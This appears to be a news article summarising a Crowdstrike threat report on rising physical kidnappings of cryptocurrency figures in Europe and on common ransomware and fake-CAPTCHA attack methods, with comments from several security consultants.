While tracking cyberattacks since last year, a Crowdstrike report also found that physical attacks and kidnappings have increased dramatically, particularly in Europe.
“In January 2025, threat actors kidnapped and attempted to extort the co-founder of Ledger, a prolific cryptocurrency wallet vendor, in France,” the Crowdstrike report said. “Although the threat actors in this case and numerous others have been arrested, the threat persists. Between January 2025 and September 2025, 17 similar incidents occurred in Europe, 13 of which occurred in France.”
Cybersecurity consultants said that they have been hearing similar reports of increased violence to gain system access for quite some time.
“I am seeing both an increase in the use of cyberattacks as a distraction for real world thefts and attacks, and the combined use of cyber and physical means to achieve criminal objectives. It is giving a new meaning to ‘brute force’ attacks,” said cybersecurity consultant Brian Levine, a former federal prosecutor who today serves as executive director of FormerGov, a directory of former government and military specialists. “As a result, both organizations and individuals are already deepening their focus on physical security and executive security. Playbooks for cyber should explicitly encourage the team to consider whether the incident they are addressing may be, in whole or in part, a distraction for some other type of attack.”
Art Cooper, the principal security consultant at TrustedSec, said his key, albeit flippant, recommendation for executives who could be physically threatened by criminals trying to gain data access is, “Get a shotgun.”
Cooper said that part of the problem is the typically loose way in which many European and American enterprises handle physical security, compared with, for example, enterprises in India.
He said Indian enterprises typically have multi-layered physical security around key buildings, with different security firms handling different layers. When someone enters, he said, they are typically asked to submit all electronic devices for inspection, where guards record all serial numbers. As the visitor moves deeper into the building, other security teams, working for other security companies, inspect those devices and capture the serial numbers again.
However, he has started seeing enterprises in China and Japan embracing the lax methods practiced by Americans. “Asian society is starting to be just as bad as Western,” Cooper said.
Noted Flavio Villanustre, SVP and CISO for LexisNexis Risk Solutions: “Physical violence as a service, such as kidnapping, is taking things to a different level, where criminals don’t seem to care much about losing the veil of anonymity protection that the internet gives them.”
Key targets
The Crowdstrike report detailed some of the global patterns for attack prevalence.
“Entities in Europe are more than twice as likely to be targeted than entities in the Asia Pacific and Japan region,” the report said, adding that the European Union’s GDPR is one of the reasons. “Threat actors have leveraged GDPR data breach penalties to pressure victims into paying ransoms. Several threat actors have threatened to report entities for regulatory noncompliance via their data leak sites, in ransom notes, or during negotiations.”
The report highlighted various statistical attack patterns, including the most targeted verticals (manufacturing, professional services, technology, industrials and engineering, and retail) and the most popular attack methods, including, it said, “Dumping credentials from backup and restore configuration databases, which often store credentials used to access hypervisor infrastructure; remotely encrypting files, executing ransomware, often from an unmanaged system, and running the file encryption process outside of the targeted system; leveraging access to unmanaged systems to steal data and deploy ransomware; and deploying Linux ransomware on VMware ESXi infrastructure.”
Another increasingly popular attack vector, the report said, is creating fake CAPTCHA lures to deliver malware. “This social engineering technique involves using pages that imitate CAPTCHA authentication tests to convince victims to copy, paste, and execute malicious code into the Windows Run dialog box or terminal. Identified campaigns used phishing emails, malicious advertising (malvertising), and search engine optimization (SEO) poisoning to direct targets to fake CAPTCHA pages.”
Some criminal services have aggressively pushed specific capabilities as their own specialties, the report noted: “Advertised features included dynamically created code obfuscation, security bypass capabilities and decoy functionalities [such as] imitating cryptocurrency management platforms.”
Not surprisingly, the report found that the tradition of Russian attack groups avoiding victimizing Russian businesses and consumers is still very much in evidence.
“The prohibition on targeting organizations and citizens of Russia and Commonwealth of Independent States (CIS) countries has long been a tacit and often codified rule in the Russian-language underground ecosystem,” the report said. “Though this prohibition is likely rooted in an attempt to avoid domestic law enforcement, patriotism also likely plays a role, with CIS-based eCrime threat actors preferring to target external entities.”
No Responses